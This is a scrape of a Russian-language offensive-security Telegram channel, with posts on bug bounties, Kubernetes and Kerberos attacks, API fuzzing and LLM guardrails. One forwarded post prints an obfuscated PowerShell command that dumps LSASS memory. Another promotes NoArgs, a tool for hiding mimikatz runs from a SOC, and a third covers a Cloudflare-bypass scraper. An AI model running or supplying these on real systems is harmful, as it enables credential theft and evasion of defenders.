Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
VK 10 BB
#vk_bb
😁83
Багхантерский афтерпати
#vk_bb
😁14
This media is not supported in your browser
VIEW IN TELEGRAM
😁6🐳4
This media is not supported in your browser
VIEW IN TELEGRAM
🔥4
Forwarded from Pentester's Backlog
Obfuscated LSASS dumper command

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;


😨 Подробнее, почему такое вообще возможно
7🔥2🐳1
😁19🐳2
Недавно обсуждали, что мало молодых ребят, кто уже бы багхантил, что-то где-то выигрывал. Я назвал сразу несколько имён, но ситуация однозначна. Ребята, кто в 15 уже могут похекать госуслуги или Тинькофф, это уникумы.

А я лично стараюсь, чтобы таких ребят становилось больше и больше.

Поетому данный пост посвящается Ильдару @sypso. Он выиграл ВСОШ, Всероссийская олимпиада школьников. Я смотрел эфир, примерно понимаю какие там были проекты. Из такого, ребята переизобретали badusb, ещё какие-то штуки. Но вот лично для себя концептуально новых идей не видел. А Ильдар сделал настолько крутой проект, что он может пригодится и для red team, и для malw аналитиков, и для всех интересующихся питоном.

Так что, официально, поздравляю Ильдара с его заслуженной ПОБЕДОЙ на ВСОШ. Красавчик, личный респект от меня! 😎❤️

Я надеюсь данная история замотивирует не только его двигаться дальше, но и других молодых ребят. Ведь вы наши будущее, а мы поможем вам развиться и избежать наших ошибок)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥31😁2
Forwarded from Life-Hack - Хакер
Kubenomicon

Это база знаний начинающего исследователя, который решил задокументировать способы атаки на Kubernetes. (Ещё есть матрица угроз от Microsoft для Kubernetes, которая ориентирована на защиту системы.)

Для многих новичков проект Kubenomicon может быть полезным, однако стоит помнить, что он все еще находится в очень сыром состоянии. Многое там еще не описано и требует доработки. Кроме того, практически все описания происходят без учета RBAC, что создает ложное представление о простоте. Очевидно, что здесь не хватает описания механизмов, которые могут противодействовать этим атакам, и почему следуя инструкциям не всегда можно достичь желаемого результата.

Ссылка на проект.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации
🔥6🌚4😁3🥰1
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентификацией без знания его пароля.
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️

Синие команды уже настраивают детекты на странный sname в AS-REQ?
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18
⚠️ NoArgs - инструмент анти-форензики и противодействия SOC
#antiforensic #windows

Когда blue team начинают анализировать логи, то им довольно просто определить цепочку наших действий смотря по логам и запущенным процессам. Но нашёл для вас интересную тулзу, которая скрывает аргументы запуска команд.

Как показано в гифке. Сначала мы "парализуем" текущую командную строку, далее запуск mimikatz будет более менее без палева. И если просто переименовать процесс в какой-нибудь excel.exe, то в логах будет виден только запуск Excel якобы. Понятное дело, что AV спалит очевидную нагрузку по куче факторов. Но как анти-форензика и real-time противодействие SOCу, думаю отлично будет. Как будет возможность, обязательно протестирую.

🧩 NoArgs

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳7🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🐭 Cloudflare Bypass
#cloudflare #bypass

Утилита для прохождения проверки Cloudflare. Будет полезно для парсинга, скрапинга, для боевых скриптов, когда сайт на CF и т.д. Автор обновляет репозиторий частенько, так что наиболее вероятно, что обходы будут работать.

Проект написан на Python, а под капотом библиотека DrissionPage.

Установка:
git clone https://github.com/sarperavci/CloudflareBypassForScraping; cd CloudflareBypassForScraping; python3 -m venv venv; source venv/bin/activate; pip3 install -r requirements.txt


Использование
python3 cloudflare_bypass.py


и у вас откроется страница, указанная в скрипте driver.get. Скрипт легко переделать под себя, там меньше 100 строчек.

🧩 Github

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9🥰6
Forwarded from Standoff 365
🆕 С 22 апреля Московская область запускает очередную краткосрочную программу багбаунти на платформе Standoff. Скоуп: zdrav.mosreg.ru

Сервис «Здоровье» заменяет бумажную медицинскую карточку пациента. Через него можно записаться на прием или вызвать врача на дом, посмотреть результаты обследований и записи о прошлых визитах в поликлинику.

До 20 мая присоединяйся к поиску уязвимостей на платформе Standoff и получай заслуженное вознаграждение!
Please open Telegram to view this post
VIEW IN TELEGRAM
5
OWASP OFFAT
#owasp #API #fuzzing

OFFensive Api Tester - это инструмент для автоматического тестирования API на основе OpenAPI. Он предоставляет возможность автоматически фаззить входные данные и использовать пользовательские данные во время тестов, заданных через конфигурационный файл YAML.

Что тестирует инструмент:

➡️Restricted HTTP Methods
➡️SQLi
➡️BOLA
➡️Data Exposure
➡️BOPLA / Mass Assignment
➡️Broken Access Control
➡️Basic Command Injection
➡️Basic XSS/HTML Injection test

Установка:
python -m pip install offat


Использование банальное:
offat -f swagger_file.json


Давно слежу за инструментом, он активно обновляется , но пока ещё в бете.
У инструмента лицензия MIT, так что компании могут свободно его использовать.
А ещё есть готовые докеры)

🧩 Github

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥192
Forwarded from DayDreamMe|Ethical (DayDream)
🛡LLM Guardrails

Существуют языковые модели, которые созданы для того, чтобы отвечать на вопросы на определенную тематику.
Например, медицинские вопросы, транспортные, заказы и проч.

В контексте безопасности ИИ, в таких языковых моделях необходимо внедрение LLM Guardrails - специальных ограждений, которые смогут определить границы для ответов таких языковых моделей.

Для чего они нужны?

Чтобы убедиться, что языковая модель ведет себя определенным образом, следует структуре ответов, и может задавать дополнительные вопросы.

Чтобы гарантировать, что языковая модель не будет себя плохо вести. Включать вредоносную информацию в ответ, отвечать на вопросы не по теме, или задавать неуместные вопросы.


В настоящее время существуют две крупные библиотеки LLM Guardrails:

🖥NVIDIA

🖥GUARDRAILS

Проверьте, не забыли ли вы добавить их в свой проект👧
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Forwarded from Mobile AppSec World (Yury Shabalin)
Исследование по защищенности мобильных приложений за 2023 год

Итак, наконец-то это случилось!

Мы выпустили отчет по "Оценке защищенности мобильных приложений" за 2023 год!

В прошлом году мы выпустили наше первое исследование защищенности мобильных приложений. На тот момент мы проанализировали порядка 700 приложений. В этом году их количество перевалило за 1800. Приложения из самых разных разных областей, самого разного размера и сложности. Все приложения были проверены при помощи Стингрей в полностью автоматическом режиме.

Что я могу сказать, вместе с числом приложений вырос и наш продукт. Для многих типов уязвимостей мы пересмотрели уровни критичности, добавилась фича с "динамическим" уровнем критичности. То есть, в зависимости от разных факторов одна и таже проблема может быть как высокого, так и низкого уровня. Добавились проверки, много новых категорий, скорость работы и многое другое.

Наверное, все эти факторы повлияли на итоговую цифру, но и не только это) Я уверен, что всё, что мы делаем не зря и приложения действительно стали более защищенными и все больше внимания в компаниях начинают уделять защищенности мобильных приложений.

В прошлом году процент приложений, в которых мы нашли критические и высокие уязвимости составлял 83%, в этом же году он составил всего 56%.

Я хочу выразить огромную благодарность всей команде за ту работу, что была проделана для появления этого масштабного анализа! Спасибо огромное!

И конечно, приятного чтения!
41